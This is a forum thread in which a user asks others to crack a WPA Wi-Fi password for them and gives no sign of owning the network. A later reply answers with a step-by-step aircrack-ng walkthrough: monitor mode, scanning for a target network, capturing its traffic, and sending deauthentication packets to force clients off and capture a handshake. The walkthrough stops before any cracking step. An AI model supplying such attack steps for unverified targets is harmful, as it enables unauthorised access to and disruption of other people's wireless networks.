Crack WPA

Discussion in 'Community Services' started by SilverSliver, 9 Jul 2018.

  1. SilverSliver

    SilverSliver Member

    Joined:
    9 Jul 2018
    Messages:
    1
    Likes Received:
    0
    I hate to ask, but I have about run out of options. For a few days now I have tried to get through a WPA password. The problem is while I have a couple of laptops neither have a decent video card. Doing a few thousand combined hashes a second is really slow compared to GPU hacking. I tried one of those stes that's supposedly free and it wasn't. I thought OK I will see if I can buy .001 bitcoins but the only card I have is a pay card and it comes up like its a prepaid so I can't even do that. I don't have much cash anyway as I got let go after being in an auto accident a month ago. Id never ask anyone unless I ran out of options. I would really appreciate it, thanks!
     

    Attached Files:

  2. longshanks

    longshanks Well-Known Member
    VIP

    Joined:
    1 Jul 2016
    Messages:
    698
    Likes Received:
    526
    Screenshot from 2018-07-14 10-27-56.png
     
    #2 longshanks, 14 Jul 2018
    Last edited: 18 Jun 2019
    • Like Like x 1
  3. mike dukes

    mike dukes Member

    Joined:
    20 Oct 2020
    Messages:
    20
    Likes Received:
    1
    Step 1: ifconfig(interface configuration) : To view or change the configuration of the network interfaces on your system.
    Here,
    eth0 : First Ethernet interface
    l0 : Loopback interface
    wlan0 : First wireless network interface on the system. (This is what we need.)
    Step 2: Stop the current processes which are using the WiFi interface
    airmon-ng check kill
    Step 3: To start the wlan0 in monitor mode.
    airmon-ng start wlan0
    Step 4: To view all the Wifi networks around you.
    airodump-ng wlan0mon
    airodump-ng : For packet capturing
    wlan0mon : Name of the interface (This name can be different on the different devices)
    Press Ctrl+C to stop the process when you have found the target network.
    Step 5: To view the clients connected to the target network.
    airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon
    airodump-ng : For packet capturing
    -c : Channel
    –bssid : MAC address of a wireless access point(WAP).
    -w : The Directory where you want to save the file(Password File).
    wlan0mon : Name of the interface.
    Step 6: Open a new terminal window to disconnect the clients connected to the target network.
    aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon
    aireplay-ng : To inject frames
    -0 : For deauthentication
    10 : No. of deauthentication packets to be sent
    -a : For the bssid of the target network
    wlan0mon : Name of the interface.
     

Share This Page

Loading...